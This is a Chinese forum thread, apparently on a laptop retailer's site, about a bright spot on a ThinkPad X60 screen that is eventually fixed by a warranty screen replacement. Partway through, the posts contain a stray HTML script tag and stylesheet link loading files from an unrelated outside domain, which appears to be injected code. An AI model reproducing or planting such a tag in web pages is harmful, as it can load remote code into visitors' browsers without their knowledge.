开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

屏幕出现一个奇怪的亮斑!求助!

我的机子是6月25日买的x60 ac4。今天突然屏幕出现一个很奇怪的亮斑。在白色背景下,非常刺眼而且有光晕!不是一般的坏点,因为根本看不出来是“小矩形”。(我笔记本也用过几台,暗点亮点我会判断的。)而且奇怪的是,在某一角度看,亮斑还能消失,比如左右以与屏幕45度视角的时候,亮斑消失,正对着屏幕,亮斑最刺眼。背景越黑,亮斑亮度越低。但是浏览网页都是白色背景阿,很刺眼!翔意,帮帮忙!
拿过来看看,有问题保修
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

现在开机,很淡,然后慢慢又没有了。太奇怪了,真是郁闷!
我敢肯定不是 液晶屏的亮点,感觉发光是从液晶屏背面过来的,所以,某些角度会看不见。现在消失了,只能再出现的时候再说了。
又有了,亮度比中午发现的时候要轻很多。我觉得那个“点”的亮度要略高于正常值。因为 在黑色背景下 几乎看不见,背景颜色越浅该点越明显。而且 该点颜色正常,不是只显示某颜色。只是亮度上的区别。
光说我也不清楚是什么,建议你拿过来我们看看
恩,好的。问题是我在外地。下次去北京的时候再去找你们。反正,我是觉得发现“问题”了,及时和你们沟通总没错的。:)
没问题随时都可以
我的机器也有类似问题
查了点资料 不知道是不是正确解释:

屏幕出现一块比其他地方亮的斑,是什么原因造成的?
  这种现象被称为液晶显示屏亮斑,是一种液晶屏的一种物理损伤。主要是由于亮斑部位的屏幕内部反光板受到外力压迫或者受热产生轻微变形所致。
   至于修复 可能需要换膜(不知道是什么膜)

如果是楼上的资料的话,我的本子应该是该点受热产生轻微变形。因为冷机状态没有这个问题,开机以后过了一会儿就出现了。下次拿去翔意看看再说,反正我自己是判断不了。
已经送修了。
没有下文?
修好了 换屏幕了。翔意售后很有保障 呵呵
coolpandeng 该用户已被删除